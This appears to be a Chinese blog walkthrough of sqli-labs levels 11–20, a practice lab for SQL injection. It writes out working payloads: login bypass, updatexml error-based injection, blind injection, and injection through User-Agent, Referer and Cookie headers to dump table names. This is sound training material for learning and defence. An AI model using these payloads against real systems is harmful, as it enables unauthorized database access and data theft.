2019-05-14
sqli-labs(11-20)
第十一关
界面终于换口味啦
data:image/s3,"s3://crabby-images/3b74e/3b74e43fca2b6dd3805993ed53625e3a314d5092" alt=""
登录系统,目测万能密码或者md5
1、先试试万能密码
username=1' or 1#password=123 返回登录成功,用户名密码为id=1时的数据
如果在发包中要对 # 进行url编码 %23
uname=1%27+or+1%23&passwd=123&submit=Submit
2、额但是我要爆库
mysql_fetch_array() 函数从结果集中取得一行作为关联数组,所以虽然本地测试万能密码能得到所有结果,但是该函数只从结果集中取得一行,有点8xing
3、尝试 uname=11'&passwd=1&submit=Submit
出现报错
data:image/s3,"s3://crabby-images/80fe6/80fe6a90a9e875c258c3a3c9ff010b4bec30711b" alt=""
可以报错注入,但是为什么是这个报错呢? 1' LIMIT 0,1 明明没有在passwd中的1后面加单引号,猜测这个单引号是本来就在的,但是前面那个单引号去哪了,被前面uname本来有的单引号配对走了。验证查询语句
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
4、构造报错注入
uname=11' and updatexml(1,concat(0x7e,(select database()),0x7e),1) #&passwd=1&submit=Submit
data:image/s3,"s3://crabby-images/eb897/eb897d600ec4361083368fd4ab99f120809073c4" alt=""
第十二关
1、界面和十一题一样,先尝试万能密码 username=1' or 1#password=123
发现不行。。。
username=1" or 1#password=123
data:image/s3,"s3://crabby-images/3b8f6/3b8f691b96c87b8204b6ec3149191b1f264adb70" alt=""
报错,应该是注释符出错了,构造 username=1" or 1 and "1"="1&password=1" or 1 and "1"="1
结果为空
通常注释符出错是因为添加了括号,所以利用and
至于上面的万能密码结果为什么为空?
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
带入变量之后
SELECT username, password FROM users WHERE username=("1" or 1 and "1"="1") and password=("1" or 1 and "1"="1") LIMIT 0,1
当然,万能密码还是有的,比如 uname=\&passwd=)or 1#&submit=Submit
2、说明存在报错注入,尝试
uname=11" and updatexml(1,concat(0x7e,(select database()),0x7e),1) and "1"="1&passwd=1&submit=Submit
data:image/s3,"s3://crabby-images/dd0b4/dd0b4cf47001a0f398653a7fa4abe340e0962105" alt=""
第十三关
和第十二关类似,把双引号改为单引号即可
第十四关
发现如下都可以
uname=11" and updatexml(1,concat(0x7e,(select database()),0x7e),1) and "1"="1&passwd=1&submit=Submit
uname=11" and updatexml(1,concat(0x7e,(select database()),0x7e),1) #&passwd=1&submit=Submit
源码为
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
第十五关
直接在bp尝试
bool盲注
uname=admin' and 1 --+&passwd=admin&submit=Submit
data:image/s3,"s3://crabby-images/32daf/32daf734af94e7214cef02c9b14337ff98206367" alt=""
uname=admin' and 0 --+&passwd=admin&submit=Submit
data:image/s3,"s3://crabby-images/b363f/b363f0a24dc94ab487048d24491b0b87fd413971" alt=""
脚本参考第七关
也可以时间盲注
脚本参考第七关
第十六关
这题又是新的组合。。。
括号+单引号,括号+双引号,单引号,双引号,两个括号+单引号
看了源码才知道怎么闭合。。。
data:image/s3,"s3://crabby-images/db5c8/db5c853f5b6d91ffe627f59cb257a2c526321c89" alt=""
相当于 SELECT username, password FROM users WHERE username=("$uname") and password=("$passwd") LIMIT 0,1
构造 uname=") or 1--+&passwd=a&submit=Submit
第十七关
页面提示
data:image/s3,"s3://crabby-images/58695/5869537b3084f2c38f97a1caa2b9806073e047f5" alt=""
猜测是update操作,猜测sql语句大概为
update users set password=$passwd where username=$uname;
1、尝试
uname=adn&passwd=a&submit=Submit
回显如下,应该是用户名不存在导致更新失败,验证操作应该是对操作影响条数进行判断
data:image/s3,"s3://crabby-images/138aa/138aa682403c9ddf9e347e59e503850b2a0234bc" alt=""
2、尝试
uname=a' or 1&passwd=11&submit=Submit 失败
uname=a" or 1&passwd=11&submit=Submit 失败
uname=a')# or 1&passwd=11&submit=Submit 失败
uname=a")# or 1&passwd=11&submit=Submit 失败
3、看看源码把,原来是分两次查询的,而且第一次查找uname还有check函数。。。
data:image/s3,"s3://crabby-images/7cf5e/7cf5ed945cf8e5e5abc173c026ab82333b8f7b3f" alt=""
data:image/s3,"s3://crabby-images/6283a/6283a4181d6a3b24450723d921b0e450b9086868" alt=""
data:image/s3,"s3://crabby-images/334e7/334e7addf87f734218f99b6ae9c6d6e5edc9d689" alt=""
data:image/s3,"s3://crabby-images/d6099/d6099edd572254639f9290abd5be28be08dddfd7" alt=""
data:image/s3,"s3://crabby-images/c9438/c9438edd3653e115cc295bf4948ea8760b87f683" alt=""
4、根据最后一行可以用报错注入,并且过滤函数没有对passwd进行过滤
魔术引号 PHP 5.3.0 起废弃并将自 PHP 5.4.0 起移除。
当打开时,所有的 '(单引号),"(双引号),\(反斜线)和 NULL 字符都会被自动加上一个反斜线进行转义。这和 addslashes() 作用完全相同。
长度不能超过20
其中过滤函数 mysql_real_escape_string()
函数转义SQL 语句中使用的字符串中的特殊字符。
\x00 \n \r \ ' " \x1a
构造 uname=admin&passwd=1'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) --+&submit=Submit
data:image/s3,"s3://crabby-images/a41d6/a41d6b176b436bd31d84f2dc5efb9a7026b4261d" alt=""
这里uname一定要存在,不然无法进入下一次update操作
第十八关
data:image/s3,"s3://crabby-images/acd4c/acd4c4c6e3fb521b3498b860e63352ad8d7332f2" alt=""
不出意外应该是 insert into 操作记录访问ip
1、查看源代码
data:image/s3,"s3://crabby-images/fa263/fa263b1068254b6d34caa985cd768af4072de163" alt=""
data:image/s3,"s3://crabby-images/d6a20/d6a20c883e475fe39d34c09d466d104c7ec3c821" alt=""
data:image/s3,"s3://crabby-images/18efe/18efe108fed346479067a641517df8c374f23d00" alt=""
data:image/s3,"s3://crabby-images/d4486/d4486a1df06be9e337ef75d3ec947a6338740857" alt=""
2、发现可以报错注入,并且只能通过uagent、ip进行,因为没有进行过滤
首先要登陆成功才能继续。。。
但是ip试了几次不知道为啥不行,
$_server[‘Remote_ADDR’]
用户IP将在HTTP标头中提供(例如X-Forwarded-For、client-ip)
在bp对ua进行修改为 User-Agent:1'
data:image/s3,"s3://crabby-images/c5ae0/c5ae025686b3136edbfd8b1558a9eefde0160d02" alt=""
闭合构造 User-Agent:1' and '1'='1
data:image/s3,"s3://crabby-images/83cf3/83cf3c6bdee504e952cdb2cc94040ff890186825" alt=""
报错注入 1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) and '1'='1
data:image/s3,"s3://crabby-images/4e531/4e53114900799054bec44e1302ec369371608573" alt=""
第十九关
之后每题都要求先登录。。。并且都是对uname和passwd进行check
和第十八关类似,把注入点从ua改成referer即可
data:image/s3,"s3://crabby-images/cbfae/cbfaeca95e2cc9aa281eb8440ee0844cf11a516e" alt=""
报错注入 1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) and '1'='1
data:image/s3,"s3://crabby-images/9c06b/9c06bf4593d3f497951f3e76bbca514f96a466c4" alt=""
第二十关
在登陆成功之后出现了cookie,修改 Cookie: uname=admin'
data:image/s3,"s3://crabby-images/4cdc3/4cdc330e464349a996666a0ff0260364ba1e9a29" alt=""
还是报错注入,构造 1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) and '1'='1
data:image/s3,"s3://crabby-images/e8e02/e8e02081be03cd2ee57e9f98738a2d6918ec1f1e" alt=""